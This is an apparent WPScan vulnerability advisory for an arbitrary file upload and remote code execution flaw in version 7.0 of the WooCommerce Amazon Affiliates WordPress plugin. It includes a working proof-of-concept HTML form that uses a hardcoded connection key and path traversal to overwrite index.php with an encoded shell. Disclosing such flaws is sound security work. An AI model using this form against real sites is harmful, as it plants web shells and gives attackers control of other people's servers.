WooCommerce Amazon Affiliates - Arbitrary File Upload



Description
This plugin is vulnerable to Local File Disclosure and Remote Code Execute via Arbitrary File Upload.

Version tested: 7.0
Proof of Concept
<form action="http://wordpress/wp-content/plugins/wwc-amz-aff/modules/remote_support/remote_tunnel.php" method="post" >
	<input type="hidden" name="connection_key" value="69efc4922575861f31125878597e97cf" >
	<input name="action" value="save_file" ><br>
	<input name="file" value="../../../index.php"><br>
	<textarea name="file_content" >BASE64 ENCODED SHELL</textarea><br>
	<input type="submit" ><br>
</form>

Affects Plugin

References

PACKETSTORM 131629
URL https://web.archive.org/web/20150912142022/http://research.evex.pw/?vuln=13
URL http://codecanyon.net/item/woocommerce-amazon-affiliates-wordpress-plugin/3057503
URL https://github.com/espreto/wpsploit/blob/master/modules/exploits/unix/webapp/wp_woocommerce_file_upload.rb

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 951
Verified No
WPVDB ID 7940

Timeline

Publicly Published 2015-04-25 (over 3 years ago)
Added 2015-04-26 (over 3 years ago)
Last Updated 2016-04-24 (over 2 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.